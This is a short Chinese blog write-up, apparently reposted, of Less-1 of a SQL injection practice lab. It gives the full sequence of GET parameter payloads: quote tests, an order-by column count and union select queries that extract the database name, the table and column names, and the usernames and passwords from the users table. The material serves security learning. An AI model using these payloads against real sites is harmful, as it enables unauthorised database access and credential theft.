Less-1

时间：2020-05-16 23:36:27 阅读：71 评论：0 收藏：0 [点我收藏+]

GET_单引号_字符型注入

?id=1
?id=1‘
?id=1"

‘单引号报错
to use near ‘‘1‘‘ LIMIT 0,1‘ at line 1
‘1‘‘ LIMIT 0,1
‘1‘‘
输入的单引号写入了查询语句

存在，GET，单引号注入

?id=1‘order by 4--+
报错，说明有3列

技术分享图片

?id=-1‘union select 1,database(),user()--+
得到security数据库

技术分享图片

?id=-1‘union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"--+

技术分享图片

?id=-1‘union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security"--+

技术分享图片

?id=-1‘union select 1,2,group_concat(username,password) from users--+

技术分享图片

原文：https://www.cnblogs.com/observering/p/12902346.html

踩

(0)

评论一句话评论（0）

分享档案

更多>